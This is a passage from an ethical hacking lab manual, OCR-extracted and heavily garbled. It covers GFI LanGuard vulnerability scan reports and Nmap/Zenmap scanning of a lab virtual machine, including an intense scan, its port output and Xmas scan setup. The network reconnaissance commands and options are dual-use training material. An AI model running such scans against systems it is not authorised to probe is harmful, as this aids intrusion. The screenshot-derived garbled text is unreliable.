Module 03 - Scanning Networks 11. It shows all the Vulnerability A ssessm en t indicators by category V GFI LanGuard 2012 -‫־‬Tbl‫־‬ x ‫־‬ L d > «‫־‬ Dashboard Sun R&neddte Activity Men!tot Reports Configuration JUbties W, D18CUB8•as v«a«on._ laaodi a Merc Scan Bar Target; »roS»: ‫י‬ ‫׳‬ | j ... MScar- 3 $ c/fomess Jgynang: Password: [curfrSr twftfonutier V1 5o r A StanRevifttOeUNa Vulnerability Assessment 5«tea ene of the 4U01Mrx)wjfcerabilry ‫יי‬3‫»*ל‬ *qn security Vumerabtmes (3) X b u you to analyze the 1 ‫־‬0‫״‬ secuirty v jr e t b i: a ^ ■Jedium Security VulneraMKies (6) ilo«.sycutoanaJy7e th s rr« lu n 1ec1rityvurerai>i5es (14Low Security Vulnerabilities. 15iy » thelc« 9ecuIty‫׳‬yeu to a^ (1)Potential vulnerabilities. o‫־־‬Xb>.s y«u to a-elvre tiie informationsecurity aJ ttit-fung Stiivfca Packs and Updalo Rollups (1) U>»3ycutoane(yK thcrmeiroiervmpKtsnVmevn Scan lUnutti Overvttm ^ $ u a U r« « t:lQ u lm l f S I S ItM J ( m R - K M M U H U M ](W M to m . - • «uhefeblty Astastrocnt A ‫*־י‬ * securitywirerablofa(3) Jl MeCtomScanty Vuherabirtes (6) j , low Searity Viinerablitfes(4J 4 PofanBd Vuherabltea (3) t Meshc servicePacksand Usdate=&u>s (1} # Msarvs Security Lfxlates (3) - _* Hec*alt&S0ftAareA1rft thread I (Idle) |Scan Pvead 7 (d t' I 5 u n t1 « : 3 Otfic] Bras / 7 During a full scan, GFI LANguard scans target computers to retrieve setup information and identify all security vulnerabilities including: ■ Missing Microsoft updates ■ System software information, including unauthori2ed applications, incorrect antivirus settings and outdated signatures ■ System hardware information, including connected modems and USB devices FIGURE 5.9:List ofVulnerabilityAssessmentcategories 12. Click Network & Software Audit in die right panel, and dien click System Patching Status, which shows all die system patching statuses t o ■ >• 4 - 1 C ri LinOuard 2012 1‫״‬r‫״‬-1 Dmhboard Sran Re‫*»״‬Aate Activity Monitor Rrpoiti Configuration JMairt <U) ' lliir in it n v n w m tau ad ts New Scan Scar ’ •o e ‫־‬- Hoft*. - ‫״‬ ‫״‬ ‫״‬h '‫־״‬1 1- *|« & Oafattab: Js en re ; Pais/.ord: |0 rren#» ogc« or uer 1‫־‬ Sari 1Remits Detais System Patching Status Selectone of tte M ta h g system w tchro M U M inting Servlet‘ Pack* ■•nit Update RoSupa (1) AlsmyeutaaiYilyiethrrnaingap'verpttlMnfarmaw Mk Missing Security Updates (,J) Alowt Mu U nWy.'t U1« mlBtfiOMcvltv updatat »1fo‫׳‬Tnalor m Missing Non-Security Updates (16) Alan* you to analyie the rwn-securityipaatea rfamssen J% staled Security Updates (2) JUave you ‫ט‬ an4>2s tJlcilitaifed security U>Ca‘x hftmala■ J%instated Non-Security Updates (1) Alo5‫״י‬ you to analyze the nstalicd nor-setuity Scan Resafe Overview - 9 Scan ta rv e t iocalhost - 3 1 8 I M A / [W » 0 3 9 N R S W « 4 ] ( I M l t K - m 5 4 M iiaebitv t o n T e il A ‫,־‬ C*' SecultY ViiieraMitte( (3) X rv*4un securityvUrcrabilBe• (6) X taw SecurityVJ*»ablt11s (4) X c‫״‬or»«nal vunrrahltif# (‫)ג‬ t *toarq Service Pata wv4 itodateRaJl«M {I) f > W < 1Saq1 UyUD0«Ufctt) I ‫״‬ ftoary-a^V flfc nufltI S % Ports U A rtor&Atrc *)- fi Software a system inlbnnaaon Scanner Actmty VVaitkm X Starting security scan of hoar WII1-I139MMSMI 9t 4[1c0.0 /] g lane: IM It U PM : 1 .v 'ry Scan thread 1 (idle) S c itr a a : I( d * : *m ~‫־‬.! t» . 3 :rrgr* FIGURE 5.10: Systempatchingstatusreport 13. Click Ports, and under diis, click Open TCP Ports Due to the large amount of information retneved from scanned targets, full scans often tend to be lengthy. It is recommended to run a full scan at least once every 2 weeks. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 118
Module 03 - Scanning Networks 1 - 1 ■ ■GFl LanGuard2012 CJ, U is c u u tins 1Scan Rarmfcale £*!1v ty Monitor Reports Corrfigura•> l«- I& jbcahoK V I ... I |M S w 1 ‫י‬ ‫י‬ ‫ו‬ • Qc0en‫־‬.dfe. Uenvaae: SasGword: |0xt«rtK ocKcC on us®‫־‬ - II 1__* = _____ 1 • ft) soiDf*crpno‫״‬: Mytxrtrrt Trerwftr Protocol {^‫ליודז‬ >sr-w r: http (kt/0er re»t Tfonjfcr PttitoroO] ^ 9 5‫כג‬ (C w ucto- DCC w»i1u‫״‬ l ‫׳‬«sOl)0«‫־‬ £ 1f) ►**CTt*0‫׳‬V NMKOS 5M »1‫׳‬ S*fM» I SOTOt r « » ‫״‬n] ^ *4J Pfiapton: MooioftOS k t t * O m lav, VMntfcwtV a n fim itw : Lrtnamn] B £ 10J7 piMotooon: !r#t»1fo, 1( tM&*ervce h not t1‫»׳‬Urt(d :*•>*« caJO &• Croj^r: eiandwtjne, Oaufipy *rd others / Sev»c s ^ t-.H |Deunpecn: LSASS, If tha » m « is not ratafc* be-*ae catfc ;<■trsjan: CtotafipyNetwork x, Oatham3 etners / Ser - 9 ::-2 |C«sobacn: MeProtect. MSrtQ, t" te 1v. M>)elc ‫י‬‫»-־‬ - » a)c ro( r •-U wJ D*m«r* COuUttt uojan: BLA trojan . Se 4‫׳‬ « £ 1241 |t« c r o o c : Ne35u5 Jcarity Scanner /Server: 1r*no«nJ 9 ^ 1433 (O sac& cn: Microsoft SQL Server database r a ‫־‬a j r w : srtscn Ser .er j S a -kx; Ofcnown] 9 v ‫־‬a«1 tn rprT-.lornlho*r ‫־‬• R : ; 10.0.0.7 |WIN-039MR5IIL9t4| (W m dvn _ - • viAwjBMy**owtwfnt J l ‫)*־‬h Sacuity ‫״<«וי‬rfiltr* (1) ^ Mtdum Scanty MinerdMIUet (6} X Law Seeunty VUnerabttiei (4} ^ PoewtOii VOwaMitfeC (3) # MoangService Pocks ondtp4?te R0I 1O9 CO # MsangSecuity Updates (3) B *•ernoHc 81Software Audit *. ( ( System Patchrg Status 333]‫־‬ P torts {Sj I‫׳>־‬1‫״‬I . floe (5)•w Coen LC» Ports 1A Hardware .i f Software 11System [nfbmodon wooer ActKRy Wtaiduw •vl ! :<*>) error■‫.׳*־‬‫־‬5 0|(Ip)/‫י‬wrfad‫״‬y v a n thread 1(tdlr) Sea* ‫׳‬1pr..«t4scev‫־‬ FIGURE 5.11: TCP/UDP Ports result 14. Click System Information in die light side panel; it shows all die details of die system information m A custom scan is a network audit based on parameters, which you configure on the fly before launching the scanning process. Vanous parameters can be customized during this type of scan, including: ■ Type of scanning profile (Le., the type of checks to execute/type of data to retrieve) ■ Scan targets ■ Logon credentials 15. Click Password Policy r‫־‬‫־‬° n nGH LanGuard 2012 E B > 1 4 - 1 Dathboatd Scan Ravrwifcalr ActHity Monitor Reports Configuration UaUwt W. 1)1*1 lew •«« m u ii tauach a Mewscan ScarTargtc P0.‫־‬«t : a i h x : v |... I (‫׳‬SjIScan 3 • &ederate: L&c‫״‬ iaBL ?aaiwd: Z~M~CTt, bcced on toe‫־‬ V 1 U 1J 1__ S a r Co'janu... Scan R etakt Ovnvmn Scan I r a k i Deta lie J *‫!־*׳‬run poaawd length: 0char- J Vaxnuri EMSSiwrd age: 42days J **‫״!־‬unoaa'wordsgeiodays J ! Peace « p ff reiw force J >Mgw0rd mtary: nohttay % open IXP Ports (5) Sf A ‫־‬ta‫־‬d/.«e *‫׳‬ I50fr»gne___ | Systsn Infotmabotj a9ki‫.׳‬W ,|lHW.fxC.!■■>>•>1 • S*.ul(. Audit Policy (Off) Wf Re0**v f t Net&JOS Mamas(3) % Computet tj| 610Lpt (28) & Users (4) LoggedCn Users (11) ^ Sesscre (2) % J<rvce5 (148) ■U Processes (76) , Remote TOO (Tme OfOay) Scanner Activity Window ■t- ‫׳‬ ‫״‬ I 1 , V 1‫״‬n thrv*d I (kllr) S can th eflU C *) i f< * 41‫־‬ !'‫׳‬' ’A ) I ‫י‬‫י‬ ‫׳‬"' FIGURE 5.12 Information ofPassword Pohcy 16. Click Groups: it shows all die groups present in die system L_/ The next job after a network security scan is to identify which areas and systems require your immediate attention. Do this by analyzing and correctly interpreting the information collected and generated during a network security scan. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 119
Module 03 - Scanning Networks ‫ר‬‫׳‬ -T o -GFI L an G u a rd 2012 !)19CUB3 Ultt VWttKJR—Dashboard S u n ftftnca& e Actmrty Monitor Reports Configuration>‫־‬* v l W **S can H CrM e re st -igemane: Password: [cuT€r*f eooed cn user H ■cc':era S c*• RevuJU D eU ik Control AucUat* Cws abx1 * P n t t a w i 0*Ji.sOuvrctgrv cmfcwaw# dccmwcm O (V'teyjM ‫>׳‬-t w i t s '! CfctrtutedCCMUser* & *n t Log Straefcrs Guests K>pe‫׳‬ VAdrritstrators E5JUSRS r^tv>:‫׳‬<Ccnfig.rstcn Cp‫־‬rators Psrfertrsnce Log Users Pr‫־‬fty1r 5rcc ' r ~a users P M v lS e rs **?Operators RES Ehdpcut Servers PCSManage‫»״‬entServers * ft ■ ft • ft • ft * ft ■ ft ‫י‬ ft • ft *ft ‫יי‬ ft * ft ‫־״‬ft • ft ♦ a » a • ft ‫ז‬ a 1 R tfvnlti Overview % C0«nUOPPwts(5) r A Menfciore • .1 Softo•'( • ^ Symrmtnknranon « S h » » (6) •4• Pd«wo1‫׳‬ ) Pdiy - i» Sxunty AudtPotcy (Off) # ‫־‬ lUotetry f t NetflCCSNarres (3) % Computer l*i groups(2a)I I W4} •?. -OXfC 0 ‫״‬ users ( 1 ‫)נ‬ % S«ss»ns (2) % Servfcee (l•*©) Hi ®rocrase* (76) ‫ג‬ en»te to o ‫חן‬‫מיו‬ Of0»y) W w r t * ‫״‬ - . S*rf« 1l1f 1 .nl 1 (tdl•‫)׳‬ | Scan tfve*0 ? frt*) Soan *read S*fe ) | 8 ‫׳‬0‫י‬ • | FIGURE 5.13: Information of Groups 17. Click die Dashboard tab: it shows all the scanned network information 1 ° n ^ ‫׳‬GFI LanGuard 2012 I Dashbcurdl Sun Remedy!* Activity Monitor Reports Configuration UUkbe; ‫־./זי‬ O ucuM lna varam.. !t f# V»' t o 4 V fei v ( 1 * t *JCem ctm •w «v ViAirrnhlfces PeA* SdNiare > 4- 5‫״‬ I qCrap Entire Network -1 computer SecurityS«1tors w nw arn iw u w • 1 ___ HT«W9MIM^g o 0 cc<rpute5‫־‬ ^ ‫ז‬ C S ^ lK I 0 cancuters Service Packs and U- Lratra-onied Aco*c Malware Protection ... ‫כ‬ O Occrrputers Cco‫־‬pu‫־‬c rj ‫ו‬ computers Vulnerabilities _ A u lt Sure* : _ Agent Hemm Issues I o •1CO‫״‬p0t«r9 « ‫ד‬ ‫י‬‫״‬ ‫י‬» !0 ; 0 C0npu18C8 r S Most M rarane cawoJSfS V. SC3y ‫׳‬ ^ L 364 ,A iirraN ity Trend Owe' tm e fu tM ByGperatng Syftem‫־‬o: 1v,vo>5Se‫«׳‬ oComputes S■O0€>ath. ■.| Conpjters By rtet» o rt.. I Computer V14>erabfeyCBtnbLiivi w 1*aer*Stofcg|>3tStafcg| it6mel1n*ork f j UKJ»-c«t: ttlh-03»Ma.5rt.4£-» ‫־‬ '^ucj1!)<»w>:y10«j<1iR<x1> Maraqe saerts ■HLsr-.‘.Krxfl*n... Sc-=radrsfrar.tfggnaMnp.raZjstarcan... Sec :wdg-.as.‫״‬ C^pm:-jr_ FIGURE 5.14: scanned report of the network Lab Analysis Dociunent all die results, dueats, and vulnerabilities discovered during die scanning and auditing process. m A high vulnerability level is the result of vulnerabilities or missing patches whose average severity is categorized as high. A scheduled scan is a network audit scheduled to run automatically on a specific date/time and at a specific frequency. Scheduled scans can be set to execute once or periodically. m It is recommended to use scheduled scans: ■ To perform periodical/regular network vulnerability scans automatically and using the same scanning profiles and parameters • To tngger scans automatically after office hours and to generate alerts and auto- distribution of scan results via email ■ To automatically trigger auto-remediation options, (e.g., Auto download and deploy missing updates) Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 120
Module 03 - Scanning Networks T ool/U tility Inform ation Collected/O bjectives Achieved Vulnerability Level Vulnerable Assessment System Patching Status Scan Results Details for Open TCP Ports GFI LanG uard 2012 Scan Results Details for Password Policy D ashboard - Entire N etw ork ■ Vulnerability Level ■ Security Sensors ■ Most Vulnerable Computers ■ Agent Status ■ Vulnerability Trend Over Time ■ Computer Vulnerability Distribution ■ Computers by Operating System P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Analyze how GFI LANgtiard products provide protection against a worm. 2. Evaluate under what circumstances GFI LAXguard displays a dialog during patch deployment. 3. Can you change die message displayed when GFI LANguard is performing administrative tasks? If ves, how? Internet Connection Required □ Yes 0 No Platform Supported 0 Classroom 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 121
Module 03 - Scanning Networks Exploring and Auditing a Network Using Nmap N/nap (Zenmap is the officialA',map GUI) is afree, opensource (license) utilityfor netirork exploration andsecurityauditing. Lab Scenario 111 die previous lab you learned to use GFI LanGuard 2012 to scan a network to find out die vulnerability level, system patching status, details for open and closed ports, vulnerable computers, etc. A11 administrator and an attacker can use die same tools to fix or exploit a system. If an attacker gets to know all die information about vulnerable computers, diey will immediately act to compromise diose systems using reconnaissance techniques. Therefore, as an administrator it is very important for you to patch diose systems after you have determined all die vulnerabilities in a network, before the attacker audits die network to gain vulnerable information. Also, as an ethical hacker and network administrator for your company, your job is to carry out daily security tasks, such as network inventory, service upgrade schedules, and the monitoring of host or service uptime. So, you will be guided in diis lab to use Nmap to explore and audit a network. Lab O bjectives Hie objective of diis lab is to help students learn and understand how to perform a network inventory, manage services and upgrades, schedule network tasks, and monitor host or service uptime and downtime. hi diis lab, you need to: ■ Scan TCP and UDP ports ■ Analyze host details and dieir topology ■ Determine the types of packet filters ICON KEY Valuable information Test vour knowledge S W eb exercise ‫ט‬ W orkbook review Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 122
Module 03 - Scanning Networks ■ Record and save all scan reports ■ Compare saved results for suspicious ports Lab Environm ent To perform die lab, you need: ■ Nmap located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksScanning ToolsNmap ■ You can also download the latest version of Nmap from the link http: / / nmap.org. / ■ If you decide to download die latest version, dien screenshots shown in die lab might differ ■ A computer running Windows Server 2012 as a host machine ■ Windows Server 2008 running on a virtual machine as a guest ■ A web browser widi Internet access ■ Administrative privileges to run die Nmap tool Lab Duration Time: 20 Minutes O verview of N etw ork Scanning Network addresses are scanned to determine: ■ What services application names and versions diose hosts offer ■ What operating systems (and OS versions) diey run ■ The type of packet filters/firewalls that are in use and dozens of odier characteristics /— j Tools demonstrated in thislabare available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks . Q Zenmap works on Windows after including Windows 7, and Server 2003/2008. Lab Tasks Follow the wizard-driven installation steps and install Nmap (Zenmap) scanner in die host machine (Window Server 2012). 1. Launch the Start menu by hovering die mouse cursor in the lower-left corner of the desktop TASK 1 Intense Scan FIGURE 6.1:Windows Server 2012—Desktop view Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 123
2. Click the Nmap-Zenmap GUI app to open the Zenmap window Module 03 - Scanning Networks S t 3 f t Administrator Server Manager Windows PowrShell Google Manager Nmap - Zenmap Sfe m * ‫י‬‫ו‬ Control Panel H y p *V Virtual Machine.. o w e Command Prompt * ‫ח‬ Frtfo* © Me^sPing HTTPort iS W M CWto* K U 1 l__ Zenmap file installs the following files: ■ Nmap Core Files ■ Nmap Path ■ WinPcap 4.1.1 ■ Network Interface Import ■ Zenmap (GUI frontend) ■ Neat (Modem Netcat) ■ Ndiff FIGURE 6.2 Windows Server 2012- Apps 3. The Nmap - Zenmap GUI window appears. ! Nmap Syntax: nmap [Scan Type(s)] [Options] {target specification} FIGURE 6.3:The Zenmap mainwindow / In port scan techniques, only one 4. Enter the virtual machine Windows Server 2008 IP address (10.0.0.4) method may be used at a t!1e j arget: text field. You are performing a network inventory for time, except that UDP scan r o J (‫־‬sU) and any one of the th e v irtu a l I11acllil1e. SCI1P scan types (‫־‬sY, -sZ) 111this lab, die IP address would be 10.0.0.4; it will be different from your lab environment 111the Profile: text field, select, from the drop-down list, the type of profile you want to scan. 111diis lab, select Intense Scan. may be combined with any 5 . one of the TCP scan types. 6. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 124
Module 03 - Scanning Networks 7. Click Scan to start scantling the virtual machine. - ‫׳‬‫׳‬ ° r xZenmap Profile: Intense scan Scan Iools Profile Help Target: 110.0.0.4| Command: nmap -T4 -A -v 10.0.0.4 Ports f Hosts | Topology | Host Details | ScansNmap Outputicc> |Host! Services OS < Host FIGURE 6.4: The Zenmap mainwindowwithTarget and Profileentered Nmap scans the provided IP address with Intense scan and displays the scan result below the Nmap Output tab. ^ ‫ם‬ ‫ז‬‫י‬ X ‫ן‬ 8. Zenmap 10.0.0.4 ‫׳י‬ Profile: Intense scan Scan: Scan Io o ls Erofile Help Target: Command: nmap -T4 -A -v 10.C.0.4 Nn ■apOutput [ports / Hosts | Topolog) | Host Details | Scans nmap-T4 •A-v 10.00.4 ^ | | Details S t o r t i n g Nmap C .O l ( h t t p : / / n m s p . o r g ) a t 2012 0 8 24 NSE: Loaded 93 s c r ip t s f o r s c a n n in g . MSE: S c r ip t P re -s c a n n in g . I n i t i a t i n g ARP P in g Scan a t 1 5 :3 5 S ca n n in g 1 0 .0 .0 .4 [1 p o r t] C o m pleted ARP P in e Scan a t 1 5 :3 5 , 0 .1 7 s e la p s e d (1 t o t a l h o s ts ) I n i t i a t i n g P a r a lle l DNS r e s o lu tio n o f 1 h o s t, a t 1 5 :3 5 C o m pleted P a r a lle l DNS r e s o lu t io n o f 1 h o s t, a t 1 5 :3 5 , 0 .5 0 s e la p s e d I n i t i a t i n g SYN S te a lth Scan a t 1 5 :3 5 S ca n n in g 1 0 .0 .0 .4 [1 0 0 0 p o r ts ] D is c o v e re d open p o r t 135!‫׳‬ tc p on 1 6 .0 .0 .4 D is c o v e re d open p o r t 1 3 9 /tc p on 1 0 .0 .0 .4 D is c o v e re d open p o r t 4451‫׳‬ tc p on 1 6 .0 .0 .4 In c r e a s in g send d e la y f o r 1 6 .0 .0 .4 f r o « 0 to ‫צ‬ dee t o 72 o u t o f 179 d ro pp ed p ro be s s in c e la s t in c re a s e . D is c o v e re d open p o r t 4 9 1 5 2 /tc p on 1 0 .0 .6 .4 D is c o v e re d open p o r t 4 9 1 5 4 /tc p on 1 0 .0 .6 .4 D is c o v e re d open p o r t 4 9 1 5 3 /tc p on 1 0 .0 .6 .4 D is c o v e re d open p o r t 4 9 1 5 6 /tc p on 1 0 .0 .6 .4 D is c o v e re d open p o r t 4 9 1 5 5 /tc p on 1 0 .0 .0 .4 D is c o v e re d open p o r t 5 3 5 7 /tc p on 1 0 .6 .0 .4 OS < Host 10.0.0.4‫׳‬ ‫׳‬ Filter Hosts FIGURE 6.5:The Zenmap mainwindowwiththeNmap Outputtab forIntense Scan 9. After the scan is complete, Nmap shows die scanned results. While Nmap attempts to produce accurate results, keep in mind that all of its insights are based on packets returned by the target machines or the firewalls in front of them. ! S "The six port states recognized byNmap: ■ Open ■ Closed ■ Filtered ■ Unfiltered ■ Open |Filtered ■ Closed|Unfiltered Nmap accepts multiple host specifications on the command line, and they don't need to be of the same type. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 125
Module 03 - Scanning Networks T = IZenmap Scan Iools £rofile Help Scan! CancelTarget: Command: nmap -T4 -A -v 10.C.0.4 Details ‫י‬‫כ‬ ‫פ‬ Nrr^p Output | Ports / Hosts | Topolog) JHost Details | Scans nmap •T4 •A ■v 10.0.0.4 M icrosoft HTTPAPI h ttpd 2.0 netbios-ssn nctbios ssn h ttp 1 3 9 /tc p open 4 4 5 /tc p open 5 3 5 7 /tc p open (SSOP/UPnP) |_ h t t p ‫־‬ m « th o d s: No A llo w o r P u b lic h «a d« r in OPTIONS re sp o n se ( s t a tu s code 503) |_ rr ttp -title : Service Unavailable ‫ח‬ M ic r o s o ft Windows RPC M ic ro s o ft Windows RPC M ic r o s o ft Windows RPC M ic r o s o ft Windows RPC M ic r o s o ft Windows RPC ;0 7 :1 0 ( M ic r o s o ft) 4 9 1 5 2 /tc p open 4 9 1 5 3 /tc p open 4 9 1 5 4 /tc p open 4 9 1 5 5 /tc p open 4 9 1 5 6 /tc p open MAC A d d re s s : 0( m srpc m srpc m srpc m srpc m srpc ______________ 1 5 :5D: D e v ic e ty p e : g e n e ra l purpose R u n n in g : M ic r o s o ft WindONS 7 | 2008 OS CPE: c p « : / o : ‫׳‬n ic ro s o ft:w in d o w s _ 7 c p e :/ o :» ic ro s o ft:w in d o w s _ s e rv e r_ 2 0 0 8 : : s p l (?‫ל‬ d e t a ils : M ic r o s o ft Windows 7 o r Windows S e rv e r 2008 SP1 U p tim e g u e ss: 0 .2 5 6 days (s in c e F r i Aug ?4 0 9 :2 7 :4 0 2012) Nttwort Distance; 1 hop TCP Sequence P r e d ic t io n : D if f ic u lt y - 2 6 3 (O ood lu c k ! ) IP IP S equence G e n e ra tio n : In c re m e n ta l S e rv ic e I n f o : OS: W indow s; CPE: c p e :/o :n ic r o s c ft:w in d o w s OS < Host 10.0.0.4‫׳‬ ‫׳‬ Filter Hosts FIGURE 6.6:The Zenmap mainwindowwiththeNmap Outputtab forIntense Scan 10. Click the Ports/Hosts tab to display more information on the scan results. 11. Nmap also displays die Port, Protocol, State. Service, and Version of the scan. T‫־‬TZenmap Scan Cancel Scan Iools Profile Help Target: 10.0.0.4 Command: nmap -T4 -A -v 10.0.0.4 Nmgp Outp u ( Tu[.ulu1jy Hu^t Details Sk m :. Minoaoft Windows RPCopen rmtpc13S tcp Microsoft HTTPAPI httpd 2.0 (SSD Microsoft Windows RPC Microsoft Windows RPC Microsoft Windows RPC Microsoft Windows RPC Microsoft Windows RPC netbios-ssn netbios-ssn http msrpc msrpc msrpc msrpc msrpc open open open open open open open open tcp tcp tcp 139 445 5337 49152 tcp 49153 tcp 49154 tcp 49155 tcp 49156 tcp Services OS < Host 10.0.0.4‫״״‬ aThe options available to control target selection: ■ -iL <inputfilename> ■ -1R <num hosts> ■ -exclude <host1>[,<host2>[,...]] ■ -excludefile <exclude file> Q The following options control host discovery: ■ -sL (list Scan) ■ -sn (No port scan) ■ -Pn (No ping) ■ ■PS <port list> (TCP SYN Ping) ■ -PA <port list> (TCP ACK Ping) ■ -PU <port list> (UDP Ping) ■ -PY <port list> (SCTP INTT Ping) ■ -PE;-PP;-PM (ICMP Ping Types) ■ -PO <protocol list> (IP Protocol Ping) ■ -PR (ARP Ping) ■ —traceroute (Trace path to host) ■ -n (No DNS resolution) ■ -R (DNS resolution for all targets) ■ -system-dns (Use system DNS resolver) ■ -dns-servers <server1>[,<server2>[,. ..]] (Servers to use for reverse DNS queries) FIGURE 6.7:The Zenmapmainwindowwiththe Ports/Hosts tab forIntense Scan C E H Lab M anual Page 126 Ethical H acking and Counterm easures Copyright © by EC-Coundl All Rights Reserved. Reproduction is Strictly Prohibited
Module 03 - Scanning Networks 12. Click the Topology tab to view Nmap’s topology for the provided IP address in the Intense scan Profile. FIGURE 6.8:The Zenmap mainwindowwithTopology tab fot Intense Scan 13. Click the Host Details tab to see die details of all hosts discovered during the intense scan profile. r ^ r ° r x 1Zenmap Scan Conccl Scan lools Profile Help Target: 10.0.0.4 Command: nmap -T4 -A -v 10.0.0.4 Scan?Hosts || Services I I Nmap Output I Porte / Hoctt | Topologyf * Host Detail‫:׳‬ 13.0.C.4 H Host Status S ta te : u p O p e n p o r t c Q Filtered poits: 0 Closed ports: 991 Scanned ports: 1000 Uptime: 22151 Last boot: FriAug 24 09:27:40 2012 B Addresses IPv4: 10.0.0.4 IPv6: Not available MAC: 00:15:50:00:07:10 - Operating System Name: Microsoft Windows 7or Windows Seiver 2008SP1 # Accuracy: Ports used OS < Host 10.0.0.4-‫־׳‬ Filter Hosts FIGURE 6.9:The Zenmap mainwindowwithHost Detailstab forIntense Scan 7 ^ t By default, Nmap performs a host discovery and then a port scan against each host it determines to be on line. 7^ ‫׳‬ By default, Nmap determines your DNS servers (for rDNS resolution) from your resolv.conf file (UNIX) or the Registry (Win32). Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 127
Module 03 - Scanning Networks 14. Click the Scans tab to scan details for provided IP addresses. 1- 1° ‫׳‬ xZenmap CancelIntense scanProfile: Scan Tools Profile Help Target: 10.0.0.4 Command: nmap •T4 •A -v 100.0.4 Hosts |[ Services | Nmap Output J Ports.' Hosts | Topology | Host Detail;| S:an; Sta!us Com‫׳‬r»ard Unsaved nmap -14-A •v 10.00.4 OS < Host 100.04 if■ Append Scan » Remove Scan Cancel Scan FIGURE 6.10:The Zenmapmainwindowwith Scantab forIntense Scan 15. Now, click the Services tab located in the right pane of the window. This tab displays the list of services. 16. Click the http service to list all the HTTP Hostnames/lP addresses. Ports, and their states (Open/Closed). * ‫ד‬‫־‬ ‫י‬ ° ‫מ‬‫ז‬Zenmap Scan Tools Profile Help Target: Comman 10.0.0.4 v ] Profile: Intense scan v | Scan| Cancel d: nmap •T4 -A -v 10.0.0.4 ‫ו‬ Hosts | Services Nmap Output Ports / Hosts Topology |HoctDrtaik | S^ant < Hostname A Port < Protocol « State « Version i 10.0.04 5357 tcp open Microsoft HTTPAPI hctpd 2.0 (SSI <L Service msrpc n e t b i o s 5 5 ‫־‬n aNmap offers options for specifyingwinch ports are scanned and whether the scan order is random!2ed or sequential. aIn Nmap, option -p <port ranges> means scan only specified ports. Q In Nmap, option -F means fast (limited port) scan. FIGURE 6.11:The Zenmap mainwindowwith Servicesoption forIntense Scan Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 128
Module 03 - Scanning Networks 17. Click the msrpc service to list all the Microsoft Windows RPC. ‫י‬‫ם‬1‫ז‬ ‫־‬ x ‫׳‬Zenmap 10.0.0.4 ‫י‬ Profile: Intense scan Scan] Scan Iools Profile Help Target: Command: nmap -T4 -A -v 10.0.0.4 Topology | Host Details^ScansPorts / HostsNmcp Output 4 Hostname *‫־‬ Port < Protocol * State « Version • 100.0.4 49156 Up open Mkroioft Windoro RPC • 100.0.4 49155 tcp open Microsoft Windows RPC • 100.0.4 49154 tcp open Microsoft Windows RPC • 100.04 49153 tcp open Microsoft Windows RPC • 100.04 49152 tcp open Microsoft Windows RPC • 100.0.4 135 tcp open Microsoft Windows RPC Services Service http netbios-ssn In Nmap, Option — port-ratio <ratio><dedmal number between 0and 1> means Scans all ports in nmap-services file with a ratio greater than the one given. <ratio> must be between 0.0and 1.1 FIGURE 6.12 The Zenmap mainwindowwith msrpc ServiceforIntense Scan 18. Click the netbios-ssn service to list all NetBIOS hostnames. TTTZenmap Scan Cancel Scan Icols Erofile Help Target: 10.0.0.4 Command: nmap -T4 -A -v 10.0.0.4 Topology Host Deoils ScansPorts f HostsNmap Output open open 445 tcp 139 tcp 100.0.4 100.0.4 Hosts || Services | Service http msrpc FIGURE 6.13:The Zenmapmainwindowwithnetbios-ssn ServiceforIntenseScan 19. Xmas scan sends a TCP frame to a remote device with URG, ACK, RST, SYN, and FIN flags set. FIN scans only with OS TCP/IP developed h id In Nmap, Option -r means don't randomi2e ports. TASK 2 Xmas Scan Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 129
Module 03 - Scanning Networks according to RFC 793. The current version of Microsoft Windows is not supported. 20. Now, to perform a Xmas Scan, you need to create a new profile. Click Profile ‫>־‬ New Profile or Command Ctrl+P y ‫׳‬ Xmas scan (-sX) sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. m The option —max- retries <numtries> specifies the maximum number ofport scan probe retransmissions. 21. On the Profile tab, enter Xmas Scan in the Profile name text field. Profile Editor ‫!׳‬map -T4 -A -v 10.0.0.4 Help Description The description is a full description 0♦v»hac the scan does, which may be long. C a n e d 0S a v e C h a n g e s Scan | Ping | Scripting | Target | Source[ Other | TimingProfile XmasScanj Profile Information Profile name D * c e r ip tio n m The option -host- timeout <time> gives up on slow target hosts. FIGURE 6.15:The Zenmap ProfileEditorwindowwiththe Profiletab C E H Lab M anual Page 130 Ethical H acking and Counterm easures Copyright © by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited.
